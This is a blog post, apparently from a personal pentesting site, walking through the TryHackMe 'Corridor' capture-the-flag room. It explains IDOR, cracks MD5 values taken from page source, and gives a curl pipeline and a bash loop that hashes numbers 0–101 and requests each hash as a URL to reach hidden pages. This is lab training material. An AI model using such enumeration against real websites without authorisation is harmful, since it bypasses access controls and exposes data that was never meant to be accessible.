30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Corridor

5 months ago n0w4n

This is a challenge from tryhackme.com which is marked as easy.

Enumeration

Normally I would start with a portscan to find a point of entry.
But in this case, there is useful information about the challenge:

You have found yourself in a strange corridor. Can you find your way back to where you came?
In this challenge, you will explore potential IDOR vulnerabilities. Examine the URL endpoints you access as you navigate the website and note the hexadecimal values you find (they look an awful lot like a hash, don't they?). This could help you uncover website locations you were not expected to access.

IDOR or insecure direct object references are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.

So I’m going to fire up a browser a checkout the website.

Recon

Every door leads to a room. But when we check the source code of the main page, there is something mentioned in the beginning.

The strings do look like hashes and a hash is a character or string encoded with a hashing algorithm like sha1. In this case they’re md5 hashes. How do I know?
There is a very nice website with a large database filled with hashes and their plaintext counterparts: crackstation.net

But first I need to extract the hashes from the website.
You can do this numerous ways, but I like the use of the cli.

curl -s 10.10.43.179 | grep title= | awk '{print $4}' | cut -d '"' -f2

The first part of this command will retrieve the content of the website.
The second part will show only the string with title= in it
The third part will only show the fourth column
And the last part will cut off everything before "

Then you can copy/paste the entire row.

When I dump the list of hashes, I get the plaintext counterparts which shows a pattern.
Because I need find the correct hashes, I’m going to use a script to automate my search.

#!/bin/bash
url='http://10.10.43.179'
for number in {0..101}
do
hex="$(echo -n "${number}" | md5sum | awk '{print $1}')"
echo "${hex}"
curl -s "${url}"/"${hex}" | grep -v "PUBLIC|404|Not Found|not found"
done

This script will create a for-loop and runs iterative from 0 to 100.
With every iteration it creates a md5 hash from the number that it’s running (remember it runs the for-loop with what is given in the statement: for number in 'range'
With that hash it will retrieve the content of the given page, while filtering out the 404 errors.

The result is a small list of operational pages and one of them holds the flag.

Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.